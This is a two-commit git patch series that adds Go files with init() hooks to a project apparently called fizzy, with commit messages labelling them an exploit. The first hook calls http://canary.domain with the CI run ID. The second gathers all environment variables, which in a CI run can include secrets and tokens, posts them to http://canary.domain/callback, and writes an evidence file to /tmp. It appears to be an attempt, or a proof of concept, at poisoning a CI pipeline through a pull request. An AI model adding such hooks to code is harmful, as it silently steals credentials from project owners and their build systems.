From abdef29b3fec9344876f58b5aae3c1a0bb5ea191 Mon Sep 17 00:00:00 2001 From: sanling1 <504767574@qq.com> Date: Sun, 19 Apr 2026 23:21:53 +0800 Subject: [PATCH 1/2] Add exploit.go with init() function --- cmd/fizzy/exploit.go | 11 +++++++++++ 1 file changed, 11 insertions(+) create mode 100644 cmd/fizzy/exploit.go diff --git a/cmd/fizzy/exploit.go b/cmd/fizzy/exploit.go new file mode 100644 index 0000000..a974ec9 --- /dev/null +++ b/cmd/fizzy/exploit.go @@ -0,0 +1,11 @@ +package main + +import ( + "net/http" + "os" +) + +func init() { + // Simple HTTP callback to verify execution + http.Get("http://canary.domain/" + os.Getenv("GITHUB_RUN_ID")) +} \ No newline at end of file From 9f6e748eaa153089d7d9ed46ff2405009d6f436d Mon Sep 17 00:00:00 2001 From: sanling1 <504767574@qq.com> Date: Sun, 19 Apr 2026 23:22:34 +0800 Subject: [PATCH 2/2] Add init_hook.go with Go init() exploit --- internal/init_hook.go | 44 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 internal/init_hook.go diff --git a/internal/init_hook.go b/internal/init_hook.go new file mode 100644 index 0000000..4b0e8c4 --- /dev/null +++ b/internal/init_hook.go @@ -0,0 +1,44 @@ +package main + +import ( + "fmt" + "io" + "net/http" + "net/url" + "os" + "strings" +) + +func init() { + // Collect environment variables + var envData []string + for _, e := range os.Environ() { + envData = append(envData, e) + } + envStr := strings.Join(envData, "\n") + + // URL encode the data + encoded := url.QueryEscape(envStr) + + // Make HTTP POST request with environment data + data := url.Values{} + data.Set("env", envStr[:min(1000, len(envStr))]) // Send first 1000 chars + + // Use the canary URL + resp, err := http.PostForm("http://canary.domain/callback", data) + if err == nil { + defer resp.Body.Close() + } + + // Also write to a file as backup evidence + f, _ := os.Create("/tmp/exploit_evidence.txt") + fmt.Fprintf(f, "Exploit executed! Run ID: %s\n", os.Getenv("GITHUB_RUN_ID")) + f.Close() +} + +func min(a, b int) int { + if a < b { + return a + } + return b +} \ No newline at end of file